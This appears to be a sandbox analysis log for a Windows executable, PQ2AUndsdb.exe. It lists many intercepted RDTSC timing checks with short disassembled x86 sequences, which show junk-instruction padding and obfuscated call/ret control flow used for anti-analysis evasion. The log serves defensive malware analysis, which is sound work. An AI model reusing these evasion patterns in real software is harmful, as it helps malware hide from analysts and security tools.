Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E190AD second address: E190B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E19212 second address: E1923A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA0AD4759DCh 0x0000000a push edx 0x0000000b jmp 00007FA0AD4759DEh 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1923A second address: E1923F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E193E2 second address: E193E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1955E second address: E19575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007FA0AD455106h 0x0000000c js 00007FA0AD455106h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E19575 second address: E19588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD4759DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E196FD second address: E1970E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jo 00007FA0AD455106h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E19846 second address: E1984A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1984A second address: E19850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E19850 second address: E1985E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FA0AD4759D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1985E second address: E19885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FA0AD45510Eh 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1B2AB second address: E1B2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1B35F second address: E1B36E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1B36E second address: E1B373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1B373 second address: E1B379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1B4BD second address: E1B50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 jne 00007FA0AD4759E0h 0x0000000f nop 0x00000010 mov esi, edx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FA0AD4759D8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov edx, dword ptr [ebp+122D1E92h] 0x00000034 push 7B04D37Eh 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1B50D second address: E1B518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA0AD455106h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1B518 second address: E1B5B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 7B04D3FEh 0x00000010 mov cl, 16h 0x00000012 push 00000003h 0x00000014 jne 00007FA0AD4759D9h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d mov dx, 0509h 0x00000021 pop ecx 0x00000022 push 00000003h 0x00000024 mov edi, 08C0CA46h 0x00000029 push 90FCB212h 0x0000002e jmp 00007FA0AD4759E4h 0x00000033 xor dword ptr [esp], 50FCB212h 0x0000003a jmp 00007FA0AD4759E9h 0x0000003f lea ebx, dword ptr [ebp+12450208h] 0x00000045 jmp 00007FA0AD4759DEh 0x0000004a xchg eax, ebx 0x0000004b jmp 00007FA0AD4759E4h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push eax 0x00000055 pop eax 0x00000056 push eax 0x00000057 pop eax 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1B61C second address: E1B620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E1B75C second address: E1B7E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007FA0AD4759E0h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FA0AD4759D8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D2BEAh], ecx 0x00000032 jg 00007FA0AD4759D7h 0x00000038 lea ebx, dword ptr [ebp+12450213h] 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007FA0AD4759D8h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000017h 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D55A2h], esi 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jnl 00007FA0AD4759D8h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3ADA1 second address: E3ADA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3ADA5 second address: E3ADAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3B1ED second address: E3B1FC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA0AD455106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3B1FC second address: E3B211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD4759E0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3B386 second address: E3B38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3B38B second address: E3B391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3B391 second address: E3B395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3B7C3 second address: E3B7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3B7CC second address: E3B7E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E42200 second address: E4220B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FA0AD4759D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E427C5 second address: E427CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E427CA second address: E427FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007FA0AD4759EFh 0x0000000e pushad 0x0000000f jmp 00007FA0AD4759E5h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d je 00007FA0AD4759D8h 0x00000023 push edi 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E41018 second address: E4101E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4101E second address: E41022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4170B second address: E41719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA0AD45510Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E42946 second address: E4294A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4294A second address: E42950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E42950 second address: E4295A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA0AD4759D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4295A second address: E42985 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA0AD455106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA0AD455119h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E109A8 second address: E109AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E109AC second address: E109C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD45510Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E0EF13 second address: E0EF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FA0AD4759DBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E481EB second address: E481F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E481F1 second address: E481F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E481F8 second address: E48224 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA0AD455118h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b jc 00007FA0AD455108h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E48224 second address: E48280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD4759E4h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jnp 00007FA0AD4759EBh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA0AD4759E5h 0x00000019 jmp 00007FA0AD4759DFh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E48280 second address: E48284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E48284 second address: E4828F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E486D6 second address: E486E2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA0AD455106h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E486E2 second address: E486F2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA0AD4759E2h 0x00000008 jng 00007FA0AD4759D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E486F2 second address: E486FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA0AD45510Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E489FF second address: E48A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DAh 0x00000007 jne 00007FA0AD4759D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FA0AD4759DEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E48A21 second address: E48A32 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA0AD45510Ch 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E48A32 second address: E48A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4A413 second address: E4A454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FA0AD455115h 0x00000014 popad 0x00000015 pop esi 0x00000016 mov eax, dword ptr [eax] 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA0AD455116h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4A454 second address: E4A4A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push esi 0x0000000c push ecx 0x0000000d jno 00007FA0AD4759D6h 0x00000013 pop ecx 0x00000014 pop esi 0x00000015 pop eax 0x00000016 mov edi, dword ptr [ebp+122D36FEh] 0x0000001c jc 00007FA0AD4759DCh 0x00000022 mov dword ptr [ebp+122D18EFh], ebx 0x00000028 call 00007FA0AD4759D9h 0x0000002d jmp 00007FA0AD4759DBh 0x00000032 push eax 0x00000033 jmp 00007FA0AD4759DDh 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4A4A7 second address: E4A4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4A760 second address: E4A764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4A764 second address: E4A76A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4A8ED second address: E4A8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4A8F1 second address: E4A8FB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA0AD455106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4A8FB second address: E4A915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA0AD4759E6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4A915 second address: E4A919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4A9D3 second address: E4A9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA0AD4759D6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4AB68 second address: E4AB6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4AFA0 second address: E4AFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4B3C0 second address: E4B3C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4B3C4 second address: E4B3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4B633 second address: E4B637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4B637 second address: E4B65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov esi, ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e jp 00007FA0AD4759E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4B65F second address: E4B663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4BAD7 second address: E4BB3B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA0AD4759E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub dword ptr [ebp+122D1BBAh], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FA0AD4759D8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov si, E369h 0x00000033 js 00007FA0AD4759DBh 0x00000039 mov edi, 2CE394B0h 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 jo 00007FA0AD4759D6h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4BB3B second address: E4BB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4C4A8 second address: E4C51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jg 00007FA0AD4759DAh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D55F4h], ecx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FA0AD4759D8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 jnl 00007FA0AD4759DCh 0x00000036 movzx esi, si 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007FA0AD4759D8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 push eax 0x00000056 push edi 0x00000057 jnp 00007FA0AD4759DCh 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4D702 second address: E4D707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E03634 second address: E0363F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E0363F second address: E03645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4DF2B second address: E4DF31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E03645 second address: E03650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA0AD455106h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4DF31 second address: E4DF35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E03650 second address: E0366D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA0AD455116h 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4DF35 second address: E4DF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FA0AD4759D6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E4F867 second address: E4F88E instructions: 0x00000000 rdtsc 0x00000002 js 00007FA0AD455106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d jo 00007FA0AD455116h 0x00000013 jmp 00007FA0AD455110h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
